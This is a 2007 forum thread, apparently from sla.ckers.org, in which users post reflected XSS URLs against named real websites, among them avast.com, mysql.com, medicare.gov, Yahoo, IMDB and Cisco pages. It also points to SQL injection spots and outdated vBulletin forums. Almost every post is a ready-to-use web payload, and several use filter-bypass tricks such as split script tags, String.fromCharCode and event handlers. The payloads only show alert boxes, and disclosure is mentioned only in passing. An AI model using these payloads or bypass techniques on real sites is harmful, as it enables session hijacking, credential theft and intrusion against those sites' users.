More XSS in avast.com...

http://www.avast.com/eng/search.php?searchFor=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E

Could be a popular one:
http://www.lotro-europe.com/search.php?keyword=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cnull

The US forum (http://forum.lotro.com) is running on vBulletin 3.6.3 which apparently is prone to SQL injection.
The EU forum (http://community.codemasters.com/forum/forumdisplay.php?f=417) is running on vBulletin 3.0.7, introducing more problems.
http://www.milw0rm.com/related.php?program=vBulletin

Don't ya love it when things are rushed out of the door.

http://www.wotsit.org/list.asp?search=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://search.medicare.gov/search?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&output=xml_no_dtd&client=default_frontend&site=default_collection&proxystylesheet=default_frontend

http://www.travelex.com/fr/locations/default.asp?step=3&lang="><script>alert(1)</script>

http://www.mysql.com/login.php?dest="><script>alert(/Nemessis-www.rstzone.net/)</script>



http://www.scamwatch.gov.au/content/search/index.phtml?filter=1&rowLimit=25&searchQueryCollection="><script>alert(/Nemessis-www.rstzone.net/)</script>&searchQueryString=



Edited 1 time(s). Last edit at 06/09/2007 07:36PM by nemessis.

National Gallery of Art

http://www.nga.gov/cgi-bin/htsearch?words=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

http://www22.verizon.com/Search/sresults/?SearchText=%22;alert(1);%22

http://www.esrb.org/ratings/search.jsp?titleOrPublisher=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cscript%3E&searchType=title

AOL fixed the XSS in their video search that rsnake posted in January (http://sla.ckers.org/forum/read.php?3,44,page=38), but it can still be exploited with a slightly different query:

http://video.aol.com/video-search/query/%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cscript%3E

http://www.discovery.com/search/results.html?query=%22%29%3Balert%281%29%3Ba%3D%28%22

http://thepiratebay.org/search/%5C%22%3E%5C%22%3E%3Cscript%3Ealert(1)%3C/script%3E/0/0/100,200,300,400,600

EDIT: Just a heads up, multiple alerts.



Edited 1 time(s). Last edit at 06/10/2007 04:00PM by Mongo.

http://www.mininova.org/search/?search=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

#&

above 2 already posted http://sla.ckers.org/forum/read.php?3,44,10816#msg-10816
We should all do a search on this topic to see if anyone else has posted the same XSS. Go to forum search choose this forum and then put in the domain of the XSS and see if anyone has posted the same exploit. Takes 30 secs to do it. Just my 2 cents, I hate seeing the same stuff posted. =o)

CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> above 2 already posted
> http://sla.ckers.org/forum/read.php?3,44,10816#msg
> -10816
> We should all do a search on this topic to see if
> anyone else has posted the same XSS. Go to forum
> search choose this forum and then put in the
> domain of the XSS and see if anyone has posted the
> same exploit. Takes 30 secs to do it. Just my 2
> cents, I hate seeing the same stuff posted. =o)

oops sorry sometimes I just get stuck in a rut and forget these sort of things.

well no results for bt-chat so http://www.bt-chat.com/browse.php?category=%22 (sql injection)

#&



Edited 1 time(s). Last edit at 06/10/2007 11:32PM by sunday.

CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> above 2 already posted
> http://sla.ckers.org/forum/read.php?3,44,10816#msg
> -10816
> We should all do a search on this topic to see if
> anyone else has posted the same XSS. Go to forum
> search choose this forum and then put in the
> domain of the XSS and see if anyone has posted the
> same exploit. Takes 30 secs to do it. Just my 2
> cents, I hate seeing the same stuff posted. =o)

Oops, my bad. I would have thought if the person alerted the admin of the website, the website would have gotten it fixed. I mean the one I posted is over a month old...

http://www.ncl.ac.uk/search/?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cnull

yet another image host

http://www.picoodle.com/search.php?q="<script>alert(123)</script>

tr1pp33 - I need a cool sig, help? ;)

I should really take my resume off of monster. This is like the 3rd pyramid scheme website this week =(

http://www.allianzfinance.biz/results.jsp?searchTerm=%3Cscript%3Ealert%28%27Please+do+not+pyramid+scheme+me%27%29%3B%3C%2Fscript%3E&domainName=allianzfinance.biz&w=false&afdt=-97w45fQQuAKEwj4pfXLxdqMAhUluBUKHWVdKGcQAhgDIAAw7dmFEQ&searchbox=y

edit, I'm bored tonight, gonna go through my spam folder:

http://www.devry-degrees.com/form.jsp?FN="><script>alert('XSS');</script>

http://ultimategiftsforyou.com/rd_p?p=152680&t=2739&c=&a="><script>alert('HI');</script>

http://www.directdishsatellitetv.info/1/form.jsp?FN="><script>alert('XSS');</script>

http://www.incentivegroupdirect.com/?cmd=landing&subid1="><script>alert(123)</script>

http://www.petcarerx.com/PCareRx/Default.aspx?&company=intela&id=";alert('xss');/*

http://www.akollio.com/brand.php?br_x=asdf"><script>alert(12345);</script>&g=M



Edited 6 time(s). Last edit at 06/13/2007 10:32PM by fyoung.

I don't believe that this has been disclosed yet: http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=alert(String.fromCharCode(88,83,83))%3E&y=Search&fr=yfp-t-501

-tx @ lowtech-labs.org

IMDB
http://www.imdb.com/gallery/granitz/5550/SylvesterS_Grani_11855453_400.jpg.html?path=pgallery&path_key="><script>alert("StallOWND");</script>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

One thing I haven't seen much posted here is the big networking guys, like Cisco, Foundry, Sonicwall, etc...

- RSnake
Gotta love it. http://ha.ckers.org

rsnake Wrote:
-------------------------------------------------------
> One thing I haven't seen much posted here is the
> big networking guys, like Cisco, Foundry,
> Sonicwall, etc...

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://investor.cisco.com/phoenix.zhtml?c=81192%26p=irol-eventReminderSuccess&control_EventReminderEmailText=%22%3E%3Cscript%3Ealert(12345)%3C/script%3E

Long day, figured I'd do something while I am sitting here instead of just watching movies =0

Hahah, nice!

- RSnake
Gotta love it. http://ha.ckers.org

http://sonicwall.mediaroom.com/index.php?s=82&query=%3Cscript%3Ealert(12345)%3C/script%3E

Last one for the night. Technically it isnt foundry, but its their career section, so....


http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.cytiva.com/nfl/apply.asp?act=dologin&email=%22%3E%3Cscript%3Ealert(12345)%3C/script%3E

edit: without the post forwarder, been up for too long today

http://www.cytiva.com/nfl/apply.asp?act=dologin&cocode=&reccode=&jobid=&email=%22%3E%3Cscript%3Ealert(12345)%3C/script%3E



Edited 1 time(s). Last edit at 06/14/2007 10:15PM by fyoung.

http://adbux.org/?r=%22%3Cscript%3Ealert(1)%3C/script%3E - 11 alerts.

In honor of a spammer ( http://sla.ckers.org/forum/read.php?17,12448 ):

http://aboutgolfschool.com/search/search1.php?searWords=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E&Send=Search
http://www.aboutcareereducation.com/search/search.php?searWords=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E&Send=Search
http://www.thenursingschool.com/blog/template_archives_cat.asp?cat= <-sql

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 06/15/2007 05:31PM by tx.

http://britneyspears.musictoday.com/main/portal/login?my_account_login=%22%3E%3Csc%3Cscript%3Eript%3Ealert('xss');%3C/sc%3Cscript%3Eript%3E%3C%21

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/15/2007 07:44PM by tx.

http://www.zencudo.co.uk/shopping/search.phtml?q=foo%22+onfocus=%22if(this.value=='foo')alert('xss');this.value='xss';%22+value=foo%22